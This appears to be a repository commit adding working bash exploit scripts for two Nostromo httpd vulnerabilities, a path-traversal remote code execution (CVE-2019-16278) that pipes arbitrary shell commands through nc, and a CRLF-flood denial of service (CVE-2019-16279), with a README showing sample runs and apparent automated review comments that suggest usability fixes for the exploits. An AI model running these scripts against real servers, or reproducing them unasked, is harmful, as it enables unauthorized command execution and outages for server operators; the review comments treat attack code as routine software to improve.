
First commit

master
sp0re 1 month ago
commit c24998744b
3 changed files with 46 additions and 0 deletions
  1. CVE-2019-16278.sh (+14, -0)
  2. CVE-2019-16279.sh (+7, -0)
  3. README.md (+25, -0)

CVE-2019-16278.sh (+14, -0)

@@ -0,0 +1,14 @@
#!/usr/bin/env bash

HOST="$1"
PORT="$2"
shift 2

( \
echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'; \
echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
| sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'



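Review bot: there is no argument check before `HOST="$1"`, `PORT="$2"` and the unconditional `shift 2`, so running the script with fewer than two arguments hands `nc` an empty host and port instead of failing early; add a guard at the top such as `[ $# -ge 3 ] || { echo "usage: $0 HOST PORT CMD..." >&2; exit 1; }`, matching the invocation shown in the README. The `sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'` filter, which strips the HTTP response headers before printing the body, is the least readable line in the file and uses GNU-only long options; a one-line comment stating what it does (and that GNU sed is required) would save the next reader from decoding it.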
CVE-2019-16279.sh (+7, -0)

@@ -0,0 +1,7 @@
#!/usr/bin/env bash

HOST="$1"
PORT="$2"

echo -n -e '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n' | nc "$HOST" "$PORT"


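Review bot: the single-line literal of repeated `\r\n` gives no way to tell from the source how many CRLF pairs are sent or why that number matters; the README only says "too many `\r\n`". Add a comment stating the count and the condition it is meant to reach, so the script can be checked against the vulnerability description. As in the other script, `HOST` and `PORT` are used without any check that they were supplied; the same usage guard belongs here.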
README.md (+25, -0)

@@ -0,0 +1,25 @@
# Exploits for CVE-2019-16278 and CVE-2019-16279

Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 1.9.6 (0day =]) first one is an RCE through directory transversal, second one is a DoS

### [CVE-2019-16278](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278) - Directory transversal to remote code execution

This bug is due to an incomplete fix for [CVE-2011-0751](https://nvd.nist.gov/vuln/detail/CVE-2011-0751). We can bypass a check for `/../` which allows us to execute `/bin/sh` with arbitrary arguments.

Example

$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)


### [CVE-2019-16279](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16279) - Denial of Service

This bug exploit a memory error when sending too many `\r\n` in a single connexion.

Example

$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

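Review bot: the README has spelling errors in exactly the terms readers will search for: "cricital" (critical), "transversal" (traversal, in both the heading and the body), "This bug exploit" (exploits) and "connexion" (connection). The two "Example" sessions are not fenced, so in rendered Markdown the `$` command lines and their output collapse into paragraphs; wrap each session in ``` fences. The affected range is stated as `<= 1.9.6`, but there is no pointer to a fixed version or vendor advisory for readers who need to patch rather than test; add one if available.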